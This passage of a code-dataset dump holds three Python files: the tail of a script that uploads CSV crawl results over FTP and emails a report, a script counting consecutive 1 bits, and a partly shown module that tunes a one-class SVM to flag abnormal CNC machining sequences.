ftp.close()\n\n # ftp://223.62.224.35/home\n # C:\\Users\\SKTelecom\\PycharmProjects\\PLM_Crawling\\crawling\\OSU1.png\n\ndef start_upload():\n #마지막 폴더 찾기\n filepath = \"data\"\n lastdate = max([filepath +\"/\"+ f for f in os.listdir(filepath)], key=os.path.getctime)\n abspath = os.path.dirname(os.path.abspath(__file__)) + \"\\/\" + lastdate\n print(lastdate)\n\n file_list = os.listdir(lastdate)\n # print(file_list)\n\n update_list = []\n\n try :\n for file in file_list:\n if file.find(\".csv\") != -1:\n print(\"upload ftp : \" , file)\n ftpupload_file(abspath, file)\n update_list.append(file)\n\n print(update_list)\n except Exception as ex :\n print(ex)\n sendMail(title = \"PLM Crawling Error occurred, ftpupload_file \", text = ex.__str__())\n exit(-1)\n\n last_dt = lastdate.split(\"/\")[1]\n files = []\n files.append(f\"plm_swver_DataWarehouse_{last_dt}.xls\")\n sendMail(title=\"PLM Crawling success file upload \", text=\"\\n\".join(update_list), files=files)\n\n return file_list\n\n\n## Start\nif __name__ == \"__main__\":\n # from sendMail import *\n # sendMail(\"jungil.kwon@sk.com\")\n # filepath = \"data\"\n # lastdate = max([filepath + \"/\" + f for f in os.listdir(filepath)], key=os.path.getctime)\n # # lastdir = list(reversed([\"data/\" + f for f in os.listdir(\"data\") if not \".\" in f]))[0]\n # print(lastdate)\n\n start_upload()\n\n","sub_path":"crawling/ftpupload.py","file_name":"ftpupload.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"597603151","text":"import sys\r\n\r\ndef max(a,b):\r\n return a if a>b else b\r\n\r\nn = int(input().strip())\r\n\r\nmax_num = 0\r\n# Changed from 'n' to '0'\r\ncount = 0\r\n\r\nwhile n:\r\n # changed from 'n&2' to 'n&1' \r\n while n&1:\r\n count += 1\r\n n>>=1\r\n max_num = max(count, max_num)\r\n if not n&1:\r\n count = 0\r\n # changed from 'n>>=2' to 'n>>=1' \r\n n>>=1\r\n\r\nprint(\"Maximum consecutive 1 in binary:\", max_num)","sub_path":"Binary/binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"50818252","text":"import seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nimport pickle\nfrom bisect import *\nfrom sklearn import preprocessing\nfrom sklearn.cluster import DBSCAN\nimport datetime\nimport re\nimport os\nfrom sklearn import svm\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn.externals import joblib\n\npd.set_option('display.max_row', 1000)\n# Set iPython's max column width to 50\npd.set_option('display.max_columns', 500)\npd.set_option('expand_frame_repr', False)\npd.options.mode.chained_assignment = None\n\n\ndef replace_outlier(series):\n median = np.median(series)\n std = np.std(series)\n minvalue = median - 3 * std\n maxvalue = median + 3 * std\n for item in series:\n if item < minvalue or item > maxvalue:\n series = series.replace(item, median)\n return series\n\n\ndef remove_rarevalue(series, threshold=1):\n \"\"\"\n simple function for removing some rare values (whose frequency is less than a threshold)\n :param threshold:\n :param series:\n :return:\n \"\"\"\n counts = series.value_counts()\n series = series[series.isin(counts[counts > threshold].index)]\n return series\n\n\ndef read_sequence(company):\n \"\"\"\n read sequence and add a last sequence caracteristic\n :param company:\n :return:\n \"\"\"\n sequences = pd.read_csv(company + '/sequence.csv', low_memory=True)\n sequences['lastsequence'] = sequences['sequenceid']\n prev = sequences.iloc[0]\n for index, item in sequences.iterrows():\n if index == 0:\n continue\n if item['operationid'] != prev['operationid']:\n sequences.loc[index - 1, 'lastsequence'] = 1\n prev = item\n continue\n sequences.loc[index - 1, 'lastsequence'] = 0\n prev = item\n sequences.loc[sequences.index[-1], 'lastsequence'] = 1\n # sequences.to_csv(company + '/newsequence.csv')\n\n return sequences\n\n\ndef is_stop_sequence(company, sequenceid):\n sequences = pd.read_csv(company + '/sequence.csv')\n a = sequences[sequences['sequenceid'] == sequenceid]\n if len(a) > 0:\n a.index = range(len(a))\n kind = a['sequencekind'].loc[0]\n return kind == 'Stop'\n return True\n\n\ndef read_sequenceslot(company):\n \"\"\"\n read and preprocess the sequence slots of a company\n preprocess:\n * remove the sequence slots without sequence id\n * calculate the duration and pause time\n *\n :param company:\n :return:\n \"\"\"\n\n sequenceslots = pd.read_csv(company + '/sequenceslot.csv', low_memory=True)\n sequenceslots = pd.DataFrame(sequenceslots)[\n ['sequenceid', 'machinemoduleid', 'sequenceslotbegin', 'sequenceslotend', 'sequenceslotnextbegin']]\n # remove the sequences without sequenceid\n sequenceslots = sequenceslots.dropna()\n\n sequenceslots['sequenceslotend'] = pd.to_datetime(sequenceslots['sequenceslotend'])\n sequenceslots['sequenceslotbegin'] = pd.to_datetime(sequenceslots['sequenceslotbegin'])\n sequenceslots['sequenceslotnextbegin'] = pd.to_datetime(sequenceslots['sequenceslotnextbegin'])\n\n sequenceslots['sequenceduration'] = (sequenceslots['sequenceslotend'] - sequenceslots[\n 'sequenceslotbegin']) / np.timedelta64(1, 's')\n sequenceslots['pausetime'] = (sequenceslots['sequenceslotnextbegin'] - sequenceslots[\n 'sequenceslotend']) / np.timedelta64(1, 's')\n return sequenceslots.sort_values(by='sequenceslotbegin')\n\n\ndef analyse_sequence(sequenceslots, sequenceid):\n \"\"\"\n give statistics of a given sequence (sequence id)\n :param sequenceslots:\n :param sequenceid:\n :return:\n \"\"\"\n\n def validate(series):\n def count_items_interval(serie, minimum, maximum):\n \"\"\"\n :param serie:\n :param minimum:\n :param maximum:\n :return:\n \"\"\"\n count = 0\n for val in serie:\n if minimum <= val <= maximum:\n count += 1\n return count / len(serie) * 100.00\n\n \"\"\"\n Settings:\n 1. threshold: how many examples are needed to analyse a sequence?\n 2. choose a reasonable interval: mean +- 2s or median +- 2s (echantillonnage: 2s)\n :param series:\n :return:\n 0: abnormal sequence\n 1: normal sequence\n 2: insufficient example\n \"\"\"\n if len(series) > 200:\n print('Items analysed: ' + str(len(series)))\n mode = series.mode()\n median = series.median()\n if len(mode) == 0:\n mode = [median]\n interval = (min(mode[0], median) - 2, max(mode[0], median) + 2)\n print('Interval : ' + str(interval[0]) + ' ~ ' + str(interval[1]))\n print(str(count_items_interval(series, interval[0], interval[1])) + '% of items is in this interval.')\n modevalues = ''\n for value in mode:\n modevalues += str(value) + ', '\n print('Mode value: ' + modevalues)\n print('Median: ' + str(series.median()))\n print('\\n')\n\n if count_items_interval(series, interval[0], interval[1]) < 70:\n print('Abnormal sequence!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!')\n return 0\n else:\n return 1\n print('insufficient example!\\n')\n return 2\n\n sequence_specifique = sequenceslots[sequenceslots['sequenceid'] == sequenceid].copy()\n machinemodules = sequence_specifique['machinemoduleid'].unique()\n abnormal_list = []\n normal_list = []\n insufficient_count = 0\n for machinemodule in machinemodules:\n print('Analyse of sequence ' + str(sequenceid) + ' with machine module ' + str(machinemodule))\n machinemodule_subset = sequence_specifique[sequence_specifique['machinemoduleid'] == machinemodule]\n duration_column = machinemodule_subset['sequenceduration'].copy()\n validate_value = validate(duration_column)\n if validate_value == 0:\n abnormal_list.append([sequenceid, machinemodule])\n if validate_value == 1:\n normal_list.append([sequenceid, machinemodule])\n if validate_value == 2:\n insufficient_count += 1\n\n return abnormal_list, insufficient_count, normal_list\n\n\ndef classify_sequences(company):\n sequenceslots = read_sequenceslot(company)\n totalsequences = sequenceslots['sequenceid'].unique()\n abnormal_sequences = []\n inssuficient_example = 0\n normal_sequences = []\n for sequence in totalsequences:\n if is_stop_sequence(company, sequence):\n continue\n return_values = analyse_sequence(sequenceslots, sequence)\n abnormal_sequences += return_values[0]\n inssuficient_example += return_values[1]\n normal_sequences += return_values[2]\n with open(company + '/abnormal.bin', 'wb') as abnormal:\n pickle.dump(abnormal_sequences, abnormal)\n with open(company + '/normal.bin', 'wb') as normal:\n pickle.dump(normal_sequences, normal)\n print(abnormal_sequences)\n print('found ' + str(len(abnormal_sequences)) + ' abnormal sequence among ' + str(\n len(totalsequences) - inssuficient_example) + ' analysed sequences.')\n\n\ndef clean_featurematrix(feature_matrix, company):\n def find_average(value_list):\n # missing value\n if len(value_list) == 0:\n return np.nan\n sum_value = 0\n sum_time = 0\n for item in value_list:\n sum_value += float(item[0]) * float(item[1])\n sum_time += float(item[1])\n if sum_time == 0:\n return 0\n return sum_value / sum_time\n\n def find_machinemode(value_list):\n\n \"\"\"\n 10 stands for active\n 0 stands for inactive\n for the missing value: probably active\n reason: many missing values are not really missing. there exist some long-time records (from October 1st\n to October 5th). In this situation the slots in the 4th cannot find a corresponding record in the exact\n date. Their records are in the October 1st file. Generally, the values of long-time records are normal.\n That's to say, for machine mode: active; for override value: 100%. This is the reason why i fill the\n missing value with 10 for machine mode and 100 for override value.\n\n In addition, it's necessary to enrich the machine mode processing for more complicated hierarchical system.\n (fanuc machine mode?)\n :param value_list:\n :return:\n \"\"\"\n if len(value_list) == 0:\n return 10\n sum_value = 0\n sum_time = 0\n for item in value_list:\n # 3 or 2 are both active machine mode\n if (int(item[0]) == 3) or (int(item[0]) == 2):\n sum_value += 10 * float(item[1])\n sum_time += float(item[1])\n\n elif int(item[0]) == 1:\n sum_value += 0 * float(item[1])\n sum_time += float(item[1])\n else:\n return -100 # manual operation\n if sum_time == 0:\n return 10\n return sum_value / sum_time\n\n def find_average_override(value_list):\n # missing value\n if len(value_list) == 0:\n return 100\n sum_value = 0\n sum_time = 0\n for item in value_list:\n sum_value += float(item[0]) * float(item[1])\n sum_time += float(item[1])\n if sum_time == 0:\n return 100\n return sum_value / sum_time\n\n def find_hold(value_list):\n if len(value_list) == 0 or value_list[0] == 'False':\n return 0\n return 1 # Hold operation exists\n\n def find_time(begin_timestamp):\n begin_time = begin_timestamp.time()\n midnight = datetime.time(0, 0, 0)\n eight = datetime.time(8, 0, 0)\n sixteen = datetime.time(16, 0, 0)\n if midnight <= begin_time < eight:\n return 1 # night\n if eight <= begin_time < sixteen:\n return 2 # day\n if sixteen <= begin_time:\n return 3 # evening\n return 0 # unknown\n\n def find_idletime_ratio(value_list):\n \"\"\"\n ??????\n :param value_list:\n :return:\n \"\"\"\n if len(value_list) == 0:\n return np.nan\n motiontime = 0\n idletime = 0\n for item in value_list:\n item[0] = str(item[0])\n if item[0].find('Motion') != -1 or item[0].find('ACTIVE') != -1 or item[0].find('Dwell') != -1:\n motiontime += float(item[1])\n else:\n idletime += float(item[1])\n return idletime / (motiontime + idletime + 0.01)\n\n def find_changetimes(value_list):\n if len(value_list) == 0:\n return np.nan\n else:\n return len(value_list)\n\n def find_nonstop114(value_list):\n if len(value_list) == 0:\n return True\n for item in value_list:\n item[0] = str(item[0])\n if 'Start' not in item[0] and 'ACTIVE' not in item[0]:\n return False\n return True\n\n def find_nonstop181(value_list):\n if len(value_list) == 0:\n return True\n\n for item in value_list:\n item[0] = str(item[0])\n if 'ACTIVE' not in item[0] and 'READY' not in item[0]:\n return False\n return True\n\n def find_memory_prop190(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'Memory':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def find_start_prop191(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'Start':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def find_motion_prop192(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'Motion':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def find_Auto_prop180(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'AUTOMATIC':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def find_Active_prop181(value_list):\n if len(value_list) == 0:\n return 100\n memory_time = 0\n total_time = 0\n for item in value_list:\n if str(item[0]) == 'ACTIVE':\n memory_time += float(item[1])\n total_time += float(item[1])\n else:\n total_time += float(item[1])\n return memory_time / (total_time+0.01)\n\n def is_normal(duration, interval_list):\n for interval in interval_list:\n if interval[0] <= duration <= interval[1]:\n return 1\n return 0\n\n def find_confidenceinterval_from_filter(sequenceslots):\n normal_slots = sequenceslots[(sequenceslots['feedrateoverride'] > 95) & (sequenceslots['machinemode'] > 9.5)\n & (sequenceslots['rapidtraverseoverride'] > 95)]\n return find_confidence_interval(normal_slots['sequenceduration'])\n\n def calculate_duration(sequenceslot, sequenceslots):\n sequenceid = sequenceslot['sequenceid']\n if len(sequenceslots[sequenceslots['sequenceid'] == sequenceid]['lastsequence']) == 0:\n return sequenceslot['sequenceduration'] + sequenceslot['pausetime']\n if sequenceslots[sequenceslots['sequenceid'] == sequenceid]['lastsequence'].item() == 0:\n return sequenceslot['sequenceduration'] + sequenceslot['pausetime']\n return sequenceslot['sequenceduration']\n\n feature_matrix['pausetime'] = pd.to_numeric(feature_matrix['pausetime'])\n feature_matrix['sequenceduration'] = pd.to_numeric(feature_matrix['sequenceduration'])\n feature_matrix['sequenceid'] = pd.to_numeric(feature_matrix['sequenceid'])\n feature_matrix['machinemoduleid'] = pd.to_numeric(feature_matrix['machinemoduleid'])\n feature_matrix['sequenceslotbegin'] = pd.to_datetime(feature_matrix['sequenceslotbegin'])\n feature_matrix['sequenceslotend'] = pd.to_datetime(feature_matrix['sequenceslotend'])\n feature_matrix['addition'] = feature_matrix['sequenceduration'] + feature_matrix['pausetime']\n '''\n std1 = np.std(remove_rarevalue(feature_matrix['sequenceduration'], 1))\n std2 = np.std(remove_rarevalue(feature_matrix['addition'], 1))\n if std2 < std1:\n feature_matrix['sequenceduration'] = feature_matrix['addition']\n '''\n # remove different day sequence slots\n feature_matrix['beginday'] = feature_matrix['sequenceslotbegin'].apply(lambda x: x.date())\n feature_matrix['endday'] = feature_matrix['sequenceslotend'].apply(lambda x: x.date())\n feature_matrix['sameday'] = feature_matrix['beginday'] == feature_matrix['endday']\n feature_matrix = feature_matrix[feature_matrix['sameday'] == True]\n\n # remove hold operation\n feature_matrix['hold'] = feature_matrix[115].apply(find_hold)\n # feature_matrix = feature_matrix[feature_matrix['hold'] == 0]\n\n # remove manual operation\n feature_matrix['machinemode'] = feature_matrix['machinemode'].apply(find_machinemode)\n # feature_matrix = feature_matrix[feature_matrix['machinemode'] >= 0]\n\n # remove program stop sequence slot\n feature_matrix['nonstop114'] = feature_matrix[114].apply(find_nonstop114)\n feature_matrix['nonstop181'] = feature_matrix[181].apply(find_nonstop181)\n # feature_matrix = feature_matrix[(feature_matrix['nonstop114'] == True) & (feature_matrix['nonstop181'] == True)]\n\n feature_matrix['averagefeedrate'] = feature_matrix[100].apply(find_average)\n feature_matrix['averagespindlespeed'] = feature_matrix[101].apply(find_average)\n feature_matrix['averagespindleload'] = feature_matrix[102].apply(find_average)\n feature_matrix['feedrateoverride'] = feature_matrix[103].apply(find_average_override)\n feature_matrix['spindlespeedoverride'] = feature_matrix[104].apply(find_average_override)\n feature_matrix['rapidtraverseoverride'] = feature_matrix[105].apply(find_average_override)\n feature_matrix['rapidtraverserate'] = feature_matrix[108].apply(find_average)\n feature_matrix['averagefeedrateus'] = feature_matrix[111].apply(find_average)\n feature_matrix['averagerapidtraverseus'] = feature_matrix[113].apply(find_average)\n feature_matrix['spindlespeedchangetimes'] = feature_matrix[101].apply(find_changetimes)\n feature_matrix['sequenceTime'] = feature_matrix['sequenceslotbegin'].apply(find_time)\n feature_matrix['idleTimeRatio'] = feature_matrix[114].apply(find_idletime_ratio)\n feature_matrix['ratioFeedrateSpindlespeed'] = np.log(\n feature_matrix['averagefeedrate'] / (feature_matrix['averagespindlespeed'] + 0.1))\n feature_matrix['ratioFeedrateSpindlespeedus'] = np.log(\n feature_matrix['averagefeedrateus'] / (feature_matrix['averagespindlespeed'] + 0.1))\n\n feature_matrix['memory_prop'] = feature_matrix[190].apply(find_memory_prop190)\n feature_matrix['start_prop'] = feature_matrix[191].apply(find_start_prop191)\n feature_matrix['motion_prop'] = feature_matrix[192].apply(find_motion_prop192)\n feature_matrix['auto_prop'] = feature_matrix[180].apply(find_Auto_prop180)\n feature_matrix['active_prop'] = feature_matrix[181].apply(find_Active_prop181)\n\n '''\n durations = pd.DataFrame([\n\n feature_matrix['feedrateoverride'],\n feature_matrix['machinemode'],\n feature_matrix['rapidtraverseoverride'],\n ])\n\n durations.replace([np.inf, -np.inf], np.nan, inplace=True)\n durations.fillna(durations.median(), inplace=True)\n durations.fillna(0, inplace=True)\n durations = durations.as_matrix()\n\n durations = np.array(list(zip(durations[0], durations[1], durations[2])))\n durations = preprocessing.StandardScaler().fit_transform(durations)\n db = DBSCAN(eps=0.05, min_samples=25).fit(durations)\n core_samples_mask = np.zeros_like(db.labels_, dtype=bool)\n core_samples_mask[db.core_sample_indices_] = True\n\n feature_matrix['normal'] = feature_matrix['sequenceduration'] * 0\n feature_matrix.loc[core_samples_mask, 'normal'] = 1\n\n normal_slots = feature_matrix[feature_matrix['normal'] == 1]\n if len(normal_slots) == 0:\n print('***** no cluster found! *****')\n return None\n\n duration1, prop1 = find_standard_duration(normal_slots['sequenceduration'])\n duration2, prop2 = find_standard_duration(normal_slots['addition'])\n if duration2 > 0 and prop2 >= prop1:\n standard_duration = duration2\n feature_matrix['sequenceduration'] = feature_matrix['addition']\n elif duration1 > 0 and prop1 >= prop2:\n standard_duration = duration1\n else:\n print('***** no effective cluster found! *****')\n return None\n\n interval = [[0, standard_duration + 2]]\n print('interval found: ' + str(interval))\n '''\n interval = find_confidenceinterval_from_filter(feature_matrix)\n feature_matrix['normal'] = feature_matrix['sequenceduration'].apply(is_normal, args=(interval,))\n\n # feature chosen\n learning_matrix = feature_matrix[[\n 'hold', 'nonstop114', 'nonstop181',\n # 'memory_prop', 'start_prop', 'auto_prop', 'active_prop',\n 'feedrateoverride', 'rapidtraverseoverride',\n\n\n 'machinemode',\n 'sequenceduration', 'pausetime', 'sequenceid', 'normal']]\n\n #print(learning_matrix[learning_matrix['normal'] == 0].sort_values(by='sequenceduration'))\n #print(learning_matrix[learning_matrix['normal'] == 1].sort_values(by='sequenceduration'))\n\n '''\n learning_matrix = feature_matrix[['averagefeedrate', 'averagespindlespeed', 'averagespindleload',\n 'feedrateoverride', 'rapidtraverseoverride',\n 'spindlespeedoverride', 'averagefeedrateus',\n 'machinemode',\n 'sequenceduration', 'pausetime', 'sequenceid', 'normal']]\n '''\n learning_matrix.replace([np.inf, -np.inf], np.nan, inplace=True)\n learning_matrix.fillna(learning_matrix.median(), inplace=True)\n learning_matrix.fillna(0, inplace=True)\n\n features = learning_matrix.copy()\n del features['sequenceduration']\n del features['pausetime']\n del features['sequenceid']\n del features['normal']\n\n targets = pd.Series(learning_matrix['sequenceduration'], name='sequenceduration')\n targets2 = pd.Series(learning_matrix['normal'], name='normal')\n '''\n normal = learning_matrix[learning_matrix['normal'] == 1]\n if len(normal) > 50:\n sns.distplot(remove_rarevalue(normal['sequenceduration'], 0))\n plt.figure()\n sns.distplot(remove_rarevalue((normal['sequenceduration'] + normal['pausetime']), 0))\n plt.show()\n '''\n\n return pd.concat([features, targets, targets2], axis=1)\n\n\n# noinspection PyTypeChecker\ndef get_matrix_for_machinemodule(company, machinemoduleid):\n matrix_list = []\n for root, dire, files in os.walk(company + '/matrices/machinemodule' + str(machinemoduleid)):\n if len(files) >= 1:\n for file in files:\n with open(company + '/matrices/machinemodule' + str(machinemoduleid) + '/' + file, 'rb') as matfile:\n mat = pickle.load(matfile)\n matrix_list.append(clean_featurematrix(mat, company))\n final_matrix = pd.concat(matrix_list)\n final_matrix.index = range(len(final_matrix))\n generate_model(final_matrix)\n\n\ndef calculate_fscore(true_normal, false_normal, true_alert, false_alert):\n precision1 = true_normal / (true_normal + false_normal + 0.01)\n recall1 = true_normal / (true_normal + false_alert + 0.01)\n precision2 = true_alert / (true_alert + false_alert + 0.01)\n recall2 = true_alert / (true_alert + false_normal + 0.01)\n point1 = 2 * precision1 * recall1 / (precision1 + recall1 + 0.01)\n point2 = 2 * precision2 * recall2 / (precision2 + recall2 + 0.01)\n return (point1 + point2) / 2\n\n\ndef generate_model(learning_matrix):\n def oneclasssvm_score_normal(normalresults):\n index = 0\n count = 0\n while index < len(normalresults):\n if normalresults[index] == 1:\n count += 1\n index += 1\n return count, len(normalresults) - count\n\n def oneclasssvm_score_abnormal(abnormalresults):\n index = 0\n count = 0\n while index < len(abnormalresults):\n if abnormalresults[index] == -1:\n count += 1\n index += 1\n return count, len(abnormalresults) - count\n\n scaler = preprocessing.StandardScaler()\n\n nuset = np.linspace(0.001, 0.3, num=5)\n gammaset = np.linspace(0.0001, 3, num=5)\n print('********* BEGIN *********')\n normalslots = learning_matrix[learning_matrix['normal'] == 1].copy()\n abnormalslots = learning_matrix[learning_matrix['normal'] == 0].copy()\n\n learning_matrix_copy = learning_matrix.copy()\n del learning_matrix_copy['sequenceduration']\n del learning_matrix_copy['normal']\n scaler.fit_transform(learning_matrix_copy)\n\n featuresnormal = normalslots.copy()\n del featuresnormal['sequenceduration']\n del featuresnormal['normal']\n\n featuresabnormal = abnormalslots.copy()\n del featuresabnormal['sequenceduration']\n del featuresabnormal['normal']\n\n if len(featuresabnormal) < 2 or len(featuresnormal) < 2:\n print('***** insuffisant examples! *****')\n return 2\n\n features_scaled_normal = scaler.transform(featuresnormal)\n features_scaled_abnormal = scaler.transform(featuresabnormal)\n\n rest_normal = features_scaled_normal[0:int(0.8 * len(features_scaled_normal))]\n test_normal = features_scaled_normal[int(0.8 * len(features_scaled_normal)):]\n\n cv_abnormal = features_scaled_abnormal[0:int(0.5 * len(features_scaled_abnormal))]\n test_abnormal = features_scaled_abnormal[int(0.5 * len(features_scaled_abnormal)):]\n\n print('****** Cross Validation ********')\n pointmax = 0\n nuoptimal = 0\n gammaoptimal = 0\n clfoptimal = None\n for nu in nuset:\n for gamma in gammaset:\n clf = svm.OneClassSVM(nu=nu, kernel=\"rbf\", gamma=gamma)\n point_count = 0\n iterations = range(1, 3)\n for _ in iterations:\n rest_normal_copy = rest_normal.copy()\n np.random.shuffle(rest_normal_copy)\n training_normal = rest_normal_copy[0:int(0.8 * len(rest_normal_copy))]\n cv_normal = rest_normal_copy[int(0.8 * len(rest_normal_copy)):]\n clf.fit(training_normal)\n\n normal_results = clf.predict(cv_normal)\n abnormal_results = clf.predict(cv_abnormal)\n true_normal, false_alert = oneclasssvm_score_normal(normal_results)\n true_alert, false_normal = oneclasssvm_score_abnormal(abnormal_results)\n # print('nu = ' + str(nu) + ' gamma = ' + str(gamma))\n point = calculate_fscore(true_normal, false_normal, true_alert, false_alert)\n # print(point)\n point_count += point\n pointfinal = point_count / len(iterations)\n if pointfinal > pointmax:\n pointmax = pointfinal\n nuoptimal = nu\n gammaoptimal = gamma\n clfoptimal = clf\n\n print('********************************************')\n print('nuoptimal: ' + str(nuoptimal) + ', gammaoptimal: ' + str(gammaoptimal))\n print('point final: ' + str(pointmax))\n\n print('*********** Test *************')\n clffinal = clfoptimal\n normal_results_final = clffinal.predict(test_normal)\n abnormal_results_final = clffinal.predict(test_abnormal)\n true_normal, false_alert = oneclasssvm_score_normal(normal_results_final)\n true_alert, false_normal = oneclasssvm_score_abnormal(abnormal_results_final)\n y_pred = [1] * true_normal + [0] * false_alert + [0] * true_alert + [1] * false_normal\n y_true = [1] * true_normal + [1] * false_alert + [0] * true_alert + [0] * false_normal\n print(confusion_matrix(y_true, y_pred))\n print(classification_report(y_true, y_pred))\n\n point = calculate_fscore(true_normal, false_normal, true_alert, false_alert)\n print(point)\n print('********** END ********** \\n\\n')\n return point\n\n\n# noinspection PyTypeChecker\ndef analyse_specifique_sequence_ocsvm(sequenceslots, sequenceid, machinemoduleid, company):\n analyse_sequence(sequenceslots, sequenceid)\n filename = company + '/matrices/machinemodule' + str(machinemoduleid) + '/matrix' + str(\n sequenceid) + 'machinemodule' + str(machinemoduleid) + '.mat'\n with open(filename, 'rb') as data:\n feature_matrix = pickle.load(data)\n learning_matrix = clean_featurematrix(feature_matrix, company)\n if learning_matrix is not None:\n point = generate_model(learning_matrix)\n if point > 0.7:\n return 1\n return 0\n\n\ndef draw_distribution_curve(sequenceslots, sequenceid, machinemoduleid):\n sequence_specifique = sequenceslots[(sequenceslots['sequenceid'] == sequenceid) &\n (sequenceslots['machinemoduleid'] == machinemoduleid)]\n duration_column = sequence_specifique['sequenceduration']\n duration_column = remove_rarevalue(duration_column, 2)\n plt.figure()\n plt.title('sequence ' + str(sequenceid) + ', machinemodule ' + str(machinemoduleid))\n sns.distplot(duration_column, kde=True)\n\n\ndef find_cnc_value(cnc_values, fieldid, sequenceslot):\n # pingjing zai zhe!!!!!!!!!!!!\n field_values = cnc_values[\n (cnc_values['fieldid'] == fieldid) & (cnc_values['machinemoduleid'] == sequenceslot['machinemoduleid'])]\n field_values = field_values.sort_values(by='cncvaluebegindatetime')\n field_values.index = range(len(field_values))\n slot_begintime = sequenceslot['sequenceslotbegin']\n slot_endtime = sequenceslot['sequenceslotend']\n value_list = []\n position = bisect_right(field_values['cncvaluebegindatetime'], slot_begintime)\n if position == 0:\n return []\n if position == len(field_values):\n return value_list\n cncendtime = field_values.loc[position - 1]['cncvalueenddatetime']\n if cncendtime > slot_begintime:\n if slot_endtime < cncendtime:\n time = (slot_endtime - slot_begintime) / np.timedelta64(1, 's')\n else:\n time = (cncendtime - slot_begintime) / np.timedelta64(1, 's')\n value_list.append([field_values.loc[position - 1]['cncvaluestring'], time])\n\n while slot_endtime > field_values.loc[position]['cncvaluebegindatetime']:\n cncbegintime = field_values.loc[position]['cncvaluebegindatetime']\n cncendtime = field_values.loc[position]['cncvalueenddatetime']\n if slot_endtime < cncendtime:\n time = (slot_endtime - cncbegintime) / np.timedelta64(1, 's')\n else:\n time = (cncendtime - cncbegintime) / np.timedelta64(1, 's')\n value_list.append([field_values.loc[position]['cncvaluestring'], time])\n position += 1\n if position > len(field_values) - 1:\n break\n return value_list\n\n\ndef find_machineid(machinemoduleid, company):\n machinemodule = pd.read_csv(company + '\\machinemodule.csv')\n a = machinemodule[machinemodule['machinemoduleid'] == machinemoduleid]\n a.index = range(len(a))\n return a['machineid'].loc[0]\n\n\ndef find_fact(facts, sequenceslot, company):\n machineid = find_machineid(sequenceslot['machinemoduleid'], company)\n facts = facts[facts['machineid'] == machineid]\n facts = facts.sort_values(by='factbegindatetime')\n facts.index = range(len(facts))\n slot_begintime = sequenceslot['sequenceslotbegin']\n slot_endtime = sequenceslot['sequenceslotend']\n value_list = []\n position = bisect_right(facts['factbegindatetime'], slot_begintime)\n if position == 0:\n return []\n if position == len(facts):\n return value_list\n factendtime = facts.loc[position - 1]['factenddatetime']\n if factendtime > slot_begintime:\n if slot_endtime < factendtime:\n time = (slot_endtime - slot_begintime) / np.timedelta64(1, 's')\n else:\n time = (factendtime - slot_begintime) / np.timedelta64(1, 's')\n value_list.append([facts.loc[position - 1]['machinemodeid'], time])\n while slot_endtime > facts.loc[position]['factbegindatetime']:\n factbegintime = facts.loc[position]['factbegindatetime']\n factendtime = facts.loc[position]['factenddatetime']\n if slot_endtime < factendtime:\n time = (slot_endtime - factbegintime) / np.timedelta64(1, 's')\n else:\n time = (factendtime - factbegintime) / np.timedelta64(1, 's')\n value_list.append([facts.loc[position]['machinemodeid'], time])\n position += 1\n if position > len(facts) - 1:\n break\n return value_list\n\n\ndef analyse_all_abnormal_sequences_ocsvm(company, machinemoduleid):\n sequenceslots = read_sequenceslot(company)\n pattern = re.compile(r'matrix(\\d+)machinemodule(\\d+).mat')\n sequences = []\n for root, dire, files in os.walk(company + '/matrices/machinemodule' + str(machinemoduleid)):\n if len(files) > 1:\n for file in files:\n if file.endswith('.mat'):\n search = pattern.search(file)\n if search:\n sequences.append([int(search.group(1)), int(search.group(2))])\n print(sequences)\n # random.shuffle(sequences)\n errorlist = []\n for item in sequences:\n error = analyse_specifique_sequence_ocsvm(sequenceslots, item[0], item[1], company)\n if error == 0:\n errorlist.append([item[0], item[1]])\n print('These are the sequences mal classifiées: ')\n print(errorlist)\n print(len(errorlist))\n\n\ndef find_standard_duration(distribution):\n def calculate_proportion(series, interval):\n count = 0\n for value in series.index:\n if interval[0] <= value <= interval[1]:\n count += series.loc[value]\n return count / sum(series) * 100\n counts = distribution.value_counts()\n candidate = counts.index[0]\n prop = calculate_proportion(counts, (candidate - 2, candidate + 2))\n print(prop)\n if prop > 90:\n return candidate, prop\n return candidate, -1\n\n\ndef find_confidence_interval(duration_column):\n if len(duration_column) == 0:\n return [[0, 0]]\n\n def merge_interval(interval_list):\n interval_list.sort(key=lambda x: x[0])\n prev = None\n result = []\n for inter in interval_list:\n if prev is None or prev[1] < inter[0]:\n result.append(inter)\n prev = inter\n if prev[1] < inter[1]:\n prev[1] = inter[1]\n return result\n\n def calculate_proportion(series, interval):\n count = 0\n for value in series.index:\n if interval[0] < value <= interval[1]:\n count += series.loc[value]\n return count / sum(series) * 100\n\n def calculate_proportion_fromlist(series, interval_list):\n accu = 0\n for inter in interval_list:\n accu += calculate_proportion(series, inter)\n return accu\n\n def fusion_interval(intervals):\n intervals.sort(key=lambda x: x[0])\n new_interval_list = []\n prev = None\n for interval in intervals:\n # initiation\n if prev is None:\n prev = interval\n continue\n if interval[0] <= prev[1] + 4:\n new_interval_list.append([prev[0], interval[1]])\n prev[1] = interval[0]\n else:\n prev = interval\n 